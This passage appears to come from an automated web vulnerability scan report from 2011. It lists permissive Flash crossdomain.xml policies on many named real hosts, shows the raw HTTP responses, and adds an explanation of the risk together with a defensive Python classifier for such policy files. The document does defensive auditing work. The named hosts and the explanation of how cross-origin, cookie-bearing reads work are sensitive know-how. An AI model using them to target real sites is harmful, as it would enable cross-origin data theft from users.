GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.17. http://neogames-tech.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://neogames-tech.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 287
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT
Accept-Ranges: bytes
ETag: "34cdc3c714becb1:b9f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:38:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.18. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.19. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 17 May 2011 12:49:40 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 16 May 2011 12:49:40 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.20. http://platform.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: platform.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Mon, 16 May 2011 12:47:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://poker.bet365.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://poker.bet365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: poker.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:76ef"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:41 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.22. http://res.mccont.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://res.mccont.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: res.mccont.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Jan 2009 11:17:10 GMT
ETag: "34ec3d0-cb-45fa650b39980"
Accept-Ranges: bytes
Content-Length: 203
Content-Type: text/xml
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.23. http://s.mcstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.mcstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:28 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.24. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 16 May 2011 10:45:39 GMT
Expires: Fri, 13 May 2011 10:43:36 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5388
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.25. http://s1.mcstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.mcstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.26. http://s3.mcstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.mcstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:28 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.27. http://s4.mcstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s4.mcstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s4.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.28. http://s6.mcstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s6.mcstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s6.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:28 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.29. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 12:49:30 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.30. http://spe.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Mon, 23 May 2011 12:36:15 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.31. http://static.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.getclicky.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:48 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.32. https://static.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://static.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.getclicky.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:44:35 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.33. http://va.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.34. http://winter.metacafe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://winter.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: winter.metacafe.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 08:58:38 GMT
ETag: "cc10e5-d0-48d6038e8cb80"
Accept-Ranges: bytes
Content-Length: 208
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 12:49:31 GMT
Vary: Accept-Encoding,User-Agent
Edge-control: !no-store,cache-maxage=3603
Keep-Alive: timeout=2, max=48
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.35. https://www.betsson.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.betsson.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 11 Jan 2008 13:00:48 GMT
Accept-Ranges: bytes
ETag: "0c02dfc5154c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:35 GMT
Connection: close
Content-Length: 208
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.36. http://www.huddletogether.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huddletogether.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:17 GMT
Server: Apache
Last-Modified: Sun, 21 May 2006 19:01:08 GMT
ETag: "317417c-cb-4145102292500"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-poli
...[SNIP]...

4.37. http://www.metacafe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "156a2de-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Mon, 16 May 2011 12:25:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.38. http://www.neogames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neogames.com

Response

HTTP/1.1 200 OK
Content-Length: 287
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT
Accept-Ranges: bytes
ETag: "34cdc3c714becb1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:35:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.39. http://bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ix55uumghyhpvpjpxar2rc55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...
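What "two-way interaction" means in practice for the High findings above (allow-access-from domain="*") and for the Low finding 4.39 (wildcard subdomains): before a SWF may talk to a host other than the one it was loaded from, Flash Player fetches that host's /crossdomain.xml, and if an allow-access-from entry matches the SWF's origin, the SWF can send requests that carry the victim's cookies for that host and read the complete response. With domain="*" any page able to embed a SWF gets that capability, so anything the host serves to an authenticated user becomes readable cross-origin. Two caveats apply before accepting the uniform High rating: several of the hosts listed are tracking pixels or static CDNs (for example fbcdn.net, mcstatic.com, 2mdn.net) that serve no authenticated content, where the rating overstates the impact; and secure="false" is only meaningful when the policy itself is served over HTTPS, where it additionally admits SWFs loaded over plain HTTP. The classifier below is an added example and is not part of the scan report or of any scanned site's code; it applies the report's own grading (domain="*" is High, a wildcard such as *.example.com is Low, an explicit allow list is informational) and records secure="false" and permitted-cross-domain-policies="all" as extra reasons. The three sample policies are constructed for the example; their domain names are placeholders.

```python
# Added example: grade a Flash crossdomain.xml body the way the scan
# findings above do. Not taken from the report or from any scanned site.
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List


@dataclass
class PolicyFinding:
    severity: str                          # "High", "Low" or "Info"
    reasons: List[str] = field(default_factory=list)


def classify_policy(xml_text: str) -> PolicyFinding:
    """Return the severity and the reasons behind it for one policy body.

    domain="*"            -> High   (any origin gets cookie-bearing, readable requests)
    domain="*.example"    -> Low    (every host under that suffix is trusted)
    explicit host only    -> Info   (just an allow list to review)
    """
    # expat does not fetch the external DTD named in the DOCTYPE, so this
    # parse works offline and cannot be used for entity expansion tricks.
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")

    severity = "Info"
    reasons: List[str] = []

    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies") == "all":
        reasons.append('site-control permitted-cross-domain-policies="all": '
                       'any URL on the host may serve a policy that Flash will honour')

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            severity = "High"
            reasons.append('allow-access-from domain="*": a SWF on any origin can '
                           'send requests with the victim\'s cookies and read the response')
        elif "*" in domain:
            if severity != "High":
                severity = "Low"
            reasons.append(f"wildcard allow list entry {domain}")
        else:
            reasons.append(f"explicit allow list entry {domain}")
        # secure defaults to true; "false" only matters for an HTTPS-served policy
        if rule.get("secure", "true").lower() == "false":
            reasons.append(f'secure="false" on {domain}: if this policy is served '
                           'over HTTPS, SWFs loaded over plain HTTP are admitted too')

    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*":
            severity = "High"
            reasons.append('allow-http-request-headers-from domain="*"')

    return PolicyFinding(severity, reasons)


# Constructed sample policies (not captured from any host on this page).
ALLOW_ALL = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
"""

WILDCARD_SUBDOMAINS = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*.example-casino.test"/>
  <allow-access-from domain="*.example-cdn.test"/>
</cross-domain-policy>
"""

# The shape a hardened policy takes: master policy only, explicit hosts,
# HTTPS-only SWFs.
HARDENED = """<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example-casino.test" secure="true"/>
</cross-domain-policy>
"""


if __name__ == "__main__":
    for name, body in (("allow-all", ALLOW_ALL),
                       ("wildcard-subdomains", WILDCARD_SUBDOMAINS),
                       ("hardened", HARDENED)):
        finding = classify_policy(body)
        print(f"{name}: {finding.severity}")
        for reason in finding.reasons:
            print(f"  - {reason}")
```

To check a live host, fetch http(s)://host/crossdomain.xml yourself and pass the body to classify_policy; the function deliberately takes text rather than a URL so it can be run against saved responses such as the ones in this report. Note that Flash Player accepts a policy served with Content-Type text/plain or text/html (as pixel.invitemedia.com and bigmoneyscratch.com do above), so the content type is not a mitigating factor.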

4.40. http://br.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: br.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=djr3rmjotuye0o45j01o20ii; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.41. http://br.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: br.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
